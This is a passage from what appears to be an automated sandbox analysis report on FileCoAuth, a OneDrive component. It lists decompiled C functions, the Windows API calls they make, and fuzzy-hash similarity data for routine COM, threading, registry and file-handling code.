						}
						_t14 = _t14 + 4;
						continue;
					}
					L18:
					return _t13;
				}
				_t17 = _t13;
				if(_t17 >= 0) {
					if(_t17 != 0) {
						 *0xeb1824 = 0;
					} else {
						if( *0xeb1824 == 0) {
							__imp__CoResumeClassObjects();
							_t13 = _t1;
							goto L15;
						} else {
							_t5 = E00E93A2E(_t9); // executed
							_t15 = _t5;
							if(_t15 != 0) {
								__imp__CoResumeClassObjects();
								_t13 = _t5;
								if(_t13 < 0) {
									SetEvent( *0xeb1818);
									_t10 =  *0xeb181c; // 0x0
									WaitForSingleObject(_t15, _t10 + _t10);
								}
								FindCloseChangeNotification(_t15); // executed
								L15:
								if(_t13 < 0) {
									goto L16;
								}
							} else {
								_t13 = 0x80004005;
								L16:
								E00E93A97();
							}
						}
					}
				}
				goto L18;
			}











    0x00e93696
    0x00e93696
    0x00e9369c
    0x00e936a5
    0x00e936c6
    0x00e936aa
    0x00e936b0
    0x00e936b4
    0x00e936b7
    0x00e936bc
    0x00e936be
    0x00e936be
    0x00e936c3
    0x00000000
    0x00e936c3
    0x00e93736
    0x00e9373a
    0x00e9373a
    0x00e936ca
    0x00e936cc
    0x00e936ce
    0x00e9372f
    0x00e936d0
    0x00e936d7
    0x00e9371c
    0x00e93722
    0x00000000
    0x00e936d9
    0x00e936d9
    0x00e936de
    0x00e936e2
    0x00e936eb
    0x00e936f1
    0x00e936f5
    0x00e936fd
    0x00e93703
    0x00e9370d
    0x00e9370d
    0x00e93714
    0x00e93724
    0x00e93726
    0x00000000
    0x00000000
    0x00e936e4
    0x00e936e4
    0x00e93728
    0x00e93728
    0x00e93728
    0x00e936e2
    0x00e936d7
    0x00e936ce
    0x00000000

    APIs
    • CoResumeClassObjects.OLE32(?,00000000,00E93324,?,00000000), ref: 00E936EB
    • SetEvent.KERNEL32(?,00000000,00E93324,?,00000000), ref: 00E936FD
    • WaitForSingleObject.KERNEL32(00000000,00000000,?,00000000,00E93324,?,00000000), ref: 00E9370D
    • FindCloseChangeNotification.KERNELBASE(00000000,?,00000000,00E93324,?,00000000), ref: 00E93714
    • CoResumeClassObjects.OLE32(?,00000000,00E93324,?,00000000), ref: 00E9371C
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp Download File
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: ClassObjectsResume$ChangeCloseEventFindNotificationObjectSingleWait
    • String ID:
    • API String ID: 1460886804-0
    • Opcode ID: 529ba9df74a246e194cc9a985279cc27e0f9bce53419d2756cbaf2d89a1b4f11
    • Instruction ID: 85538d99374b0e963115607366bff9a00a9c6c04e81e2bf57ad64da754b0b78d
    • Opcode Fuzzy Hash: 529ba9df74a246e194cc9a985279cc27e0f9bce53419d2756cbaf2d89a1b4f11
    • Instruction Fuzzy Hash: 361148B75044129FCF3A87B6FC44A5726E1AF8A320719112AE946B3321DB31EE098361
    Uniqueness

    Uniqueness Score: -1,00%

    Function 00E93A2E, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42threadCOMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 43 e93a2e-e93a53 CreateEventW 44 e93a88-e93a96 call ea29f2 43->44 45 e93a55-e93a71 CreateThread 43->45 46 e93a73-e93a7f CloseHandle 45->46 47 e93a85-e93a87 45->47 46->47 47->44
    C-Code - Quality: 50%
    			E00E93A2E(void* __ecx) {
				signed int _v8;
				long _v12;
				void* __edi;
				void* __esi;
				signed int _t4;
				void* _t6;
				void* _t9;
				void* _t12;
				void* _t16;
				void* _t19;
				void* _t20;
				signed int _t22;

				_push(__ecx);
				_push(__ecx);
				_t4 =  *0xeb0090; // 0xbd336131
				_v8 = _t4 ^ _t22;
				_t6 = CreateEventW(0, 0, 0, 0);
				 *0xeb1818 = _t6;
				if(_t6 != 0) {
					_push(_t20);
					_t9 = CreateThread(0, 0, E00E93AD2, ",v�", 0,  &_v12); // executed
					if(_t9 == 0) {
						CloseHandle( *0xeb1818);
						 *0xeb1818 = 0;
					}
					_pop(_t20);
				}
				_pop(_t19);
				return E00EA29F2(_t12, _v8 ^ _t22, _t16, _t19, _t20);
			}















    0x00e93a33
    0x00e93a34
    0x00e93a35
    0x00e93a3c
    0x00e93a46
    0x00e93a4c
    0x00e93a53
    0x00e93a55
    0x00e93a67
    0x00e93a71
    0x00e93a79
    0x00e93a7f
    0x00e93a7f
    0x00e93a87
    0x00e93a87
    0x00e93a8d
    0x00e93a96

    APIs
    • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,00000001,?,?,?,00E936DE,?,00000000,00E93324,?,00000000), ref: 00E93A46
    • CreateThread.KERNELBASE ref: 00E93A67
    • CloseHandle.KERNEL32(?,?,?,00E936DE,?,00000000,00E93324,?,00000000), ref: 00E93A79
    Strings
    Memory Dump Source
    • Source File: 00000009.00000002.2316793338.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000002.2316778948.0000000000E90000.00000002.sdmp Download File
    • Associated: 00000009.00000002.2316825591.0000000000EA6000.00000002.sdmp Download File
    • Associated: 00000009.00000002.2316842454.0000000000EB0000.00000004.sdmp Download File
    • Associated: 00000009.00000002.2316855023.0000000000EB3000.00000002.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_2_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: Create$CloseEventHandleThread
    • String ID: ,v
    • API String ID: 1227790905-18191835
    • Opcode ID: e7c38c5a61c31b948a67429427ad01704410128bb6402f3f83fd7bf86af6ab05
    • Instruction ID: cff63be81d8e61338a1a38d84a0bb85e94e792fe404eca987dfce2b27e9e1491
    • Opcode Fuzzy Hash: e7c38c5a61c31b948a67429427ad01704410128bb6402f3f83fd7bf86af6ab05
    • Instruction Fuzzy Hash: EEF06832600254BF87219B6BAC59C6B7BFCEBDBB21751026EF804F2210DA71AD45C6A0
    Uniqueness

    Uniqueness Score: -1,00%

    Function 00EA0BAE, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 29registryCOMMON
    Download Yara Rule
    APIs
    • RegGetValueW.KERNELBASE(80000001,Software\Microsoft\OneDrive,EnableTHDFFeatures,00000010,?,?,?), ref: 00EA0BE3
    Strings
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp Download File
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: Value
    • String ID: EnableTHDFFeatures$Software\Microsoft\OneDrive
    • API String ID: 3702945584-3051962838
    • Opcode ID: 701d07e98555256bfe32c27018713ff477bbf2591f09019964ebbd822af00ebe
    • Instruction ID: 29712cb7b6354bff606d596f4262dc8f999285d33a32a1f7637a2cb3c304bfbf
    • Opcode Fuzzy Hash: 701d07e98555256bfe32c27018713ff477bbf2591f09019964ebbd822af00ebe
    • Instruction Fuzzy Hash: 0EF06D7698030CFFDB10CF958D85AEEBBBCEB49308F1041ABE904B7141E671AB58CA51
    Uniqueness

    Uniqueness Score: -1,00%

    Function 00E93A2E, Relevance: 4.5, APIs: 3, Instructions: 42threadCOMMON
    Download Yara Rule
    C-Code - Quality: 50%
    			E00E93A2E(void* __ecx) {
				signed int _v8;
				long _v12;
				void* __edi;
				void* __esi;
				signed int _t4;
				void* _t6;
				void* _t9;
				void* _t12;
				void* _t16;
				void* _t19;
				void* _t20;
				signed int _t22;

				_push(__ecx);
				_push(__ecx);
				_t4 =  *0xeb0090; // 0xbb40e64e
				_v8 = _t4 ^ _t22;
				_t6 = CreateEventW(0, 0, 0, 0);
				 *0xeb1818 = _t6;
				if(_t6 != 0) {
					_push(_t20);
					_t9 = CreateThread(0, 0, E00E93AD2, 0xeb17e8, 0,  &_v12); // executed
					if(_t9 == 0) {
						CloseHandle( *0xeb1818);
						 *0xeb1818 = 0;
					}
					_pop(_t20);
				}
				_pop(_t19);
				return E00EA29F2(_t12, _v8 ^ _t22, _t16, _t19, _t20);
			}















    0x00e93a33
    0x00e93a34
    0x00e93a35
    0x00e93a3c
    0x00e93a46
    0x00e93a4c
    0x00e93a53
    0x00e93a55
    0x00e93a67
    0x00e93a71
    0x00e93a79
    0x00e93a7f
    0x00e93a7f
    0x00e93a87
    0x00e93a87
    0x00e93a8d
    0x00e93a96

    APIs
    • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,00000001,?,?,?,00E936DE,?,00000000,00E93324,?,00000000), ref: 00E93A46
    • CreateThread.KERNELBASE ref: 00E93A67
    • CloseHandle.KERNEL32(?,?,?,00E936DE,?,00000000,00E93324,?,00000000), ref: 00E93A79
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp Download File
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: Create$CloseEventHandleThread
    • String ID:
    • API String ID: 1227790905-0
    • Opcode ID: e7c38c5a61c31b948a67429427ad01704410128bb6402f3f83fd7bf86af6ab05
    • Instruction ID: cff63be81d8e61338a1a38d84a0bb85e94e792fe404eca987dfce2b27e9e1491
    • Opcode Fuzzy Hash: e7c38c5a61c31b948a67429427ad01704410128bb6402f3f83fd7bf86af6ab05
    • Instruction Fuzzy Hash: EEF06832600254BF87219B6BAC59C6B7BFCEBDBB21751026EF804F2210DA71AD45C6A0
    Uniqueness

    Uniqueness Score: -1,00%

    Function 00E91FC9, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
    Download Yara Rule
    APIs
    • CoRegisterClassObject.OLE32(?,00000000,00000004,00000005,?), ref: 00E9200D
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp Download File
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: ClassObjectRegister
    • String ID:
    • API String ID: 352222023-0
    • Opcode ID: 058cbf9c1edc0d0cc5cf706dd16d694e6b1a1faf3e9b99b8500b2429d9593308
    • Instruction ID: c5575ea81c4307cc10e0dd0a850470dc156014312b4cde881ee5e9a53758cf9c
    • Opcode Fuzzy Hash: 058cbf9c1edc0d0cc5cf706dd16d694e6b1a1faf3e9b99b8500b2429d9593308
    • Instruction Fuzzy Hash: 5A017C71600204BFDB248B59DC45F6BBBE9EF89715F14016DB545E7250DA71ED00DA14
    Uniqueness

    Uniqueness Score: -1,00%

    Function 00EA2BBA, Relevance: 1.5, APIs: 1, Instructions: 11COMMON
    Download Yara Rule
    C-Code - Quality: 37%
    			E00EA2BBA(void* __eflags, intOrPtr _a4) {
				void* __ebp;
				signed int _t2;
				void* _t6;
				void* _t8;
				void* _t9;

				_push(_a4);
				_t2 = E00EA2B11(_t6, _t8, _t9, __eflags); // executed
				asm("sbb eax, eax");
				return  ~( ~_t2) - 1;
			}








    0x00ea2bbd
    0x00ea2bc0
    0x00ea2bc8
    0x00ea2bce

    APIs
    • __onexit.MSVCRT ref: 00EA2BC0
      • Part of subcall function 00EA2B11: RtlDecodePointer.NTDLL(00EADA60,00000014,00EA2BC5,?,?,00E91341,00EA5971,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00EB19FC), ref: 00EA2B2D
      • Part of subcall function 00EA2B11: _onexit.MSVCR120 ref: 00EA2B3A
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp Download File
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: DecodePointer__onexit_onexit
    • String ID:
    • API String ID: 504067560-0
    • Opcode ID: 42b573c69077f550dc806ad7d788cda62597c3fb396cd59d1e96175e938ce5e4
    • Instruction ID: 431786529e64401982048fb366db99ee8244d47c752939dd0073d934ca9b6b62
    • Opcode Fuzzy Hash: 42b573c69077f550dc806ad7d788cda62597c3fb396cd59d1e96175e938ce5e4
    • Instruction Fuzzy Hash: 2EB012311A810E2BBE047DF9EC068343B8CC6126607401726FD0DD80F1DD12B4501090
    Uniqueness

    Uniqueness Score: -1,00%

    Non-executed Functions

    Function 00E969DE, Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 72COMMON
    Download Yara Rule
    APIs
      • Part of subcall function 00E982B9: GetLastError.KERNEL32(BD336131,?,?,?,?,?,00EA3B19,000000FF,?,00E967F9,?,d:\dbs\sh\odib\0313_155253\cmd\17\client\onedrive\product\ux\shared\win32api.cpp,000001D1,Win32Api::TaskDialogIndirect,pTaskConfig != NULL,pTaskConfig was NULL), ref: 00E98313
      • Part of subcall function 00E982B9: memset.MSVCR120 ref: 00E98329
      • Part of subcall function 00E982B9: memset.MSVCR120 ref: 00E98369
      • Part of subcall function 00E982B9: _vsnwprintf.MSVCR120 ref: 00E98385
    • memset.MSVCR120 ref: 00E96A3B
    • GetUserNameW.ADVAPI32(?,00000100), ref: 00E96A55
    Strings
    Memory Dump Source
    • Source File: 00000009.00000002.2316793338.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000002.2316778948.0000000000E90000.00000002.sdmp Download File
    • Associated: 00000009.00000002.2316825591.0000000000EA6000.00000002.sdmp Download File
    • Associated: 00000009.00000002.2316842454.0000000000EB0000.00000004.sdmp Download File
    • Associated: 00000009.00000002.2316855023.0000000000EB3000.00000002.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_2_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: memset$ErrorLastNameUser_vsnwprintf
    • String ID: (result != 0) && (buffer[0] != 'L\0')$Couldn't get user name.$Null argument: pUserName$Win32Api::GetUserNameW$d:\dbs\sh\odib\0313_155253\cmd\17\client\onedrive\product\ux\shared\win32api.cpp$pUserName != NULL
    • API String ID: 2966023224-1689460303
    • Opcode ID: 63dd94b099a62da7ab77a60c6d12d8fd114c2b7b44a0a58bde7b7f0e727c71c0
    • Instruction ID: bb84d5f597b9a4bf1d62ec5bdefa9e0eb85ddef787a3d60f974f936ed567e55f
    • Opcode Fuzzy Hash: 63dd94b099a62da7ab77a60c6d12d8fd114c2b7b44a0a58bde7b7f0e727c71c0
    • Instruction Fuzzy Hash: 411159B2A443047BDA10EB619C0AEAB73DCDBCAB10F00591AB554FB181EE70ED4483A2
    Uniqueness

    Uniqueness Score: -1,00%

    Function 00E9A394, Relevance: 10.6, APIs: 7, Instructions: 93fileCOMMON
    Download Yara Rule
    C-Code - Quality: 85%
    			E00E9A394(WCHAR* __ecx) {
				signed int _v8;
				void _v530;
				short _v532;
				struct _WIN32_FIND_DATAW _v1124;
				void* _v1128;
				char _v1148;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				WCHAR* _t27;
				WCHAR* _t33;
				void* _t57;
				WCHAR* _t58;
				signed int _t59;
				void* _t60;
				void* _t61;

				_t23 =  *0xeb0090; // 0xbd336131
				_v8 = _t23 ^ _t59;
				_t58 = __ecx;
				_v1124.dwFileAttributes = 0;
				memset( &(_v1124.ftCreationTime), 0, 0x24c);
				_t61 = _t60 + 0xc;
				if(_t58[0xa] < 8) {
					_t27 = _t58;
				} else {
					_t27 =  *_t58;
				}
				_t57 = FindFirstFileW(_t27,  &_v1124);
				if(_t57 == 0xffffffff) {
					L12:
					return E00EA29F2(0, _v8 ^ _t59, _t56, _t57, _t58);
				} else {
					do {
						_v532 = 0;
						memset( &_v530, 0, 0x206);
						_t61 = _t61 + 0xc;
						if(_t58[0xa] < 8) {
							_t33 = _t58;
						} else {
							_t33 =  *_t58;
						}
						if(E00E9A31C( &_v532, 0x104, _t33) >= 0) {
							PathRemoveFileSpecW( &_v532);
							_t56 =  &(_v1124.cFileName);
							if(E00E99383( &_v532,  &(_v1124.cFileName)) >= 0) {
								E00E94E9D( &_v1148,  &_v532);
								_t46 =  >=  ? _v1148 :  &_v1148;
								__imp__WerRegisterFile( >=  ? _v1148 :  &_v1148, 2, 0);
								E00E94307( &_v1148, 1, 0);
							}
						}
					} while ((FindNextFileW(_t57,  &_v1124) & 0xffffff00 | _t37 != 0x00000000) == 1);
					FindClose(_t57);
					goto L12;
				}
			}




















    0x00e9a39f
    0x00e9a3a6
    0x00e9a3bb
    0x00e9a3bd
    0x00e9a3c3
    0x00e9a3c8
    0x00e9a3cf
    0x00e9a3d5
    0x00e9a3d1
    0x00e9a3d1
    0x00e9a3d1
    0x00e9a3e5
    0x00e9a3ea
    0x00e9a4b2
    0x00e9a4c2
    0x00e9a3f0
    0x00e9a3f0
    0x00e9a3f7
    0x00e9a406
    0x00e9a40b
    0x00e9a412
    0x00e9a418
    0x00e9a414
    0x00e9a414
    0x00e9a414
    0x00e9a42e
    0x00e9a437
    0x00e9a43d
    0x00e9a450
    0x00e9a45f
    0x00e9a472
    0x00e9a47c
    0x00e9a48b
    0x00e9a48b
    0x00e9a450
    0x00e9a4a3
    0x00e9a4ac
    0x00000000
    0x00e9a4ac

    APIs
    • memset.MSVCR120 ref: 00E9A3C3
    • FindFirstFileW.KERNEL32(?,?,00000007,00000000,00000001), ref: 00E9A3DF
    • memset.MSVCR120 ref: 00E9A406
    • PathRemoveFileSpecW.SHLWAPI(?,?,00000104,?), ref: 00E9A437
    • WerRegisterFile.KERNEL32(?,00000002,00000000,?), ref: 00E9A47C
    • FindNextFileW.KERNEL32(00000000,?,?,00000104,?), ref: 00E9A498
    • FindClose.KERNEL32(00000000), ref: 00E9A4AC
    Memory Dump Source
    • Source File: 00000009.00000002.2316793338.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000002.2316778948.0000000000E90000.00000002.sdmp Download File
    • Associated: 00000009.00000002.2316825591.0000000000EA6000.00000002.sdmp Download File
    • Associated: 00000009.00000002.2316842454.0000000000EB0000.00000004.sdmp Download File
    • Associated: 00000009.00000002.2316855023.0000000000EB3000.00000002.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_2_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: File$Find$memset$CloseFirstNextPathRegisterRemoveSpec
    • String ID:
    • API String ID: 247955269-0
    • Opcode ID: 9e9a9adf6d1064b2c9ee1744de9e077c298b7da2601aab9ddab9d2ee6e7487ce
    • Instruction ID: 7c2b2cbb2dfa482be8ea7ce294fb8e364d240e9bde90d0cdd3df24256b8098f0
    • Opcode Fuzzy Hash: 9e9a9adf6d1064b2c9ee1744de9e077c298b7da2601aab9ddab9d2ee6e7487ce
    • Instruction Fuzzy Hash: D63183B1A0021C9FDF20DF64DC89AEE73BCEF55304F0405A9A619E3141EB70AE89CB65
    Uniqueness

    Uniqueness Score: -1,00%

    Function 00E9A7CF, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 22COMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E00E9A7CF(intOrPtr* __ecx, void* __eflags) {
				intOrPtr* _t13;

				_t13 = __ecx;
				E00E9A822(__ecx);
				 *__ecx = 0x38;
				 *((intOrPtr*)(__ecx + 8)) = 0xe90000;
				 *((intOrPtr*)(__ecx + 4)) = 0xe90000;
				 *((intOrPtr*)(__ecx + 0xc)) = 0xc00;
				 *((intOrPtr*)(__ecx + 0x10)) = 0xea6778;
				if(E00E91E96(0xe90000, __ecx + 0x14) < 0) {
					if(IsDebuggerPresent() != 0) {
						OutputDebugStringW(L"ERROR : Unable to initialize critical section in CAtlBaseModule\n");
					}
					 *0xeb2314 = 1;
				}
				return _t13;
			}




    0x00e9a7d0
    0x00e9a7d2
    0x00e9a7dc
    0x00e9a7e5
    0x00e9a7e8
    0x00e9a7eb
    0x00e9a7f2
    0x00e9a800
    0x00e9a80a
    0x00e9a811
    0x00e9a811
    0x00e9a817
    0x00e9a817
    0x00e9a821

    APIs
      • Part of subcall function 00E9A822: memset.MSVCR120 ref: 00E9A82F
      • Part of subcall function 00E91E96: InitializeCriticalSectionEx.KERNEL32(?,00000000,00000000,?,8007000E), ref: 00E91E9E
      • Part of subcall function 00E91E96: GetLastError.KERNEL32(?,00000000,00000000,?,8007000E), ref: 00E91EA8
    • IsDebuggerPresent.KERNEL32(?,?,?,00E91D7E), ref: 00E9A802
    • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00E91D7E), ref: 00E9A811
    Strings
    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00E9A80C
    • xg, xrefs: 00E9A7F2
    Memory Dump Source
    • Source File: 00000009.00000002.2316793338.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000002.2316778948.0000000000E90000.00000002.sdmp Download File
    • Associated: 00000009.00000002.2316825591.0000000000EA6000.00000002.sdmp Download File
    • Associated: 00000009.00000002.2316842454.0000000000EB0000.00000004.sdmp Download File
    • Associated: 00000009.00000002.2316855023.0000000000EB3000.00000002.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_2_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: CriticalDebugDebuggerErrorInitializeLastOutputPresentSectionStringmemset
    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule$xg
    • API String ID: 4206453544-4153916902
    • Opcode ID: fe8ddaaf86592a8cfd0cff75b378f138338adf2bbe8981734b49151e2e524e51
    • Instruction ID: 6882ccea9c5f1019fd45b62cc3d379fc2be0ac0f7a4f11405e6ac2a3d53145ff
    • Opcode Fuzzy Hash: fe8ddaaf86592a8cfd0cff75b378f138338adf2bbe8981734b49151e2e524e51
    • Instruction Fuzzy Hash: 89E092702003018FDB749F79E4083127AE4AF4A748F08993DE896E6640D7B4F848CBE2
    Uniqueness

    Uniqueness Score: -1,00%

    Function 00E97025, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 38COMMON
    Download Yara Rule
    C-Code - Quality: 89%
    			E00E97025(intOrPtr _a4, union _ULARGE_INTEGER* _a8, union _ULARGE_INTEGER* _a12, union _ULARGE_INTEGER* _a16) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				WCHAR* _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t13;
				void* _t21;
				void* _t23;
				void* _t28;
				void* _t29;
				void* _t31;
				void* _t32;
				void* _t35;
				signed int _t36;

				_t38 = (_t36 & 0xfffffff8) - 0xc;
				_t13 =  *0xeb0090; // 0xbd336131
				_v8 = _t13 ^ (_t36 & 0xfffffff8) - 0x0000000c;
				_v12 = _v12 & 0x00000000;
				_v16 = _a4;
				E00E9851B( &_v12, "Win32Api::GetDiskFreeSpaceExW");
				GetDiskFreeSpaceExW(_v20, _a8, _a12, _a16);
				E00E98588();
				_t31 = _t29;
				_t35 = _t32;
				_t23 = _t21;
				return E00EA29F2(_t23, _v12 ^ _t38, _t28, _t31, _t35);
			}



















    0x00e9702d
    0x00e97030
    0x00e97037
    0x00e97042
    0x00e97058
    0x00e9705c
    0x00e97068
    0x00e97074
    0x00e9707f
    0x00e97080
    0x00e97081
    0x00e9708c

    APIs
    • GetDiskFreeSpaceExW.KERNEL32(?,?,00000000,?,Win32Api::GetDiskFreeSpaceExW), ref: 00E97068
    Strings
    • Win32Api::GetDiskFreeSpaceExW, xrefs: 00E97053
    Memory Dump Source
    • Source File: 00000009.00000002.2316793338.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000002.2316778948.0000000000E90000.00000002.sdmp Download File
    • Associated: 00000009.00000002.2316825591.0000000000EA6000.00000002.sdmp Download File
    • Associated: 00000009.00000002.2316842454.0000000000EB0000.00000004.sdmp Download File
    • Associated: 00000009.00000002.2316855023.0000000000EB3000.00000002.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_2_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: DiskFreeSpace
    • String ID: Win32Api::GetDiskFreeSpaceExW
    • API String ID: 1705453755-3568922165
    • Opcode ID: 5f39753da05f62d3b03cdea0f2b13bb77554ae3752b660fa4f1911812fcaec36
    • Instruction ID: fdf7b0a0f15a2802efa27b9fa0bcb0b75c24ef8af953e0e50fe7202cf11d5ff0
    • Opcode Fuzzy Hash: 5f39753da05f62d3b03cdea0f2b13bb77554ae3752b660fa4f1911812fcaec36
    • Instruction Fuzzy Hash: 84F08132604305ABC700DF69DD45A5BB7E8EB8A720F004919F958A7291DA30ED18C7A2
    Uniqueness

    Uniqueness Score: -1,00%

    Function 00E9ECC0, Relevance: 3.0, APIs: 2, Instructions: 36COMMON
    Download Yara Rule
    C-Code - Quality: 75%
    			E00E9ECC0(void* __esi, void* __eflags) {
				void* _t18;
				signed int _t20;
				signed int _t24;
				void* _t25;
				void* _t26;
				signed int _t27;
				void* _t30;
				void* _t33;

				E00EA3161(E00EA4C2C, _t26, _t30, __esi);
				 *(_t33 - 0x10) =  *(_t33 - 0x10) & 0x00000000;
				 *(_t33 - 4) = 1;
				_t18 = _t33 - 0x10;
				__imp__CreateBindCtx(0, _t18, 4);
				_t32 = _t18;
				if(_t18 < 0) {
					L3:
					_t27 = 0;
				} else {
					_t24 =  *(_t33 - 0x10);
					_t25 =  *((intOrPtr*)( *_t24 + 0x18))(_t24,  *((intOrPtr*)(_t33 + 8)));
					_t32 = _t25;
					if(_t25 < 0) {
						goto L3;
					} else {
						_t27 =  *(_t33 - 0x10);
						 *(_t33 - 0x10) =  *(_t33 - 0x10) & 0x00000000;
					}
				}
				 *( *(_t33 + 0xc)) = _t27;
				 *(_t33 - 4) =  *(_t33 - 4) | 0xffffffff;
				_t20 =  *(_t33 - 0x10);
				if(_t20 != 0) {
					 *((intOrPtr*)( *_t20 + 8))(_t20);
				}
				return E00EA313E(_t32);
			}











    0x00e9ecc7
    0x00e9eccc
    0x00e9ecd0
    0x00e9ecd7
    0x00e9ecdd
    0x00e9ece3
    0x00e9ece7
    0x00e9ed04
    0x00e9ed04
    0x00e9ece9
    0x00e9ece9
    0x00e9ecf2
    0x00e9ecf5
    0x00e9ecf9
    0x00000000
    0x00e9ecfb
    0x00e9ecfb
    0x00e9ecfe
    0x00e9ecfe
    0x00e9ecf9
    0x00e9ed09
    0x00e9ed0b
    0x00e9ed0f
    0x00e9ed14
    0x00e9ed19
    0x00e9ed19
    0x00e9ed23

    APIs
    • __EH_prolog3.LIBCMT ref: 00E9ECC7
    • CreateBindCtx.OLE32(00000000,00000000), ref: 00E9ECDD
    Memory Dump Source
    • Source File: 00000009.00000002.2316793338.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000002.2316778948.0000000000E90000.00000002.sdmp Download File
    • Associated: 00000009.00000002.2316825591.0000000000EA6000.00000002.sdmp Download File
    • Associated: 00000009.00000002.2316842454.0000000000EB0000.00000004.sdmp Download File
    • Associated: 00000009.00000002.2316855023.0000000000EB3000.00000002.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_2_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: BindCreateH_prolog3
    • String ID:
    • API String ID: 3589265608-0
    • Opcode ID: c884f359f7d3fa54e1e0e7f53668a8cf6eeff4117e2f3aade9702a408e52dcc3
    • Instruction ID: aaa8a09987754f83be0fd878ffaefbf4db0ee9959fbd4859393422c1f7d3fb45
    • Opcode Fuzzy Hash: c884f359f7d3fa54e1e0e7f53668a8cf6eeff4117e2f3aade9702a408e52dcc3
    • Instruction Fuzzy Hash: D20146B1A012259FCF04DFA4C808BBEB7B4BF09721F140558EA25AB380CB71A900CB90
    Uniqueness

    Uniqueness Score: -1,00%

    Function 00E921A2, Relevance: 1.5, APIs: 1, Instructions: 36comCOMMON
    Download Yara Rule
    C-Code - Quality: 37%
    			E00E921A2(void* __ecx, intOrPtr* _a4) {
				void* _t4;
				intOrPtr* _t8;
				intOrPtr* _t11;
				intOrPtr* _t14;
				void* _t17;

				_t8 = _a4;
				if(_t8 != 0) {
					_t17 = 0;
					_t14 = __ecx + 0x28;
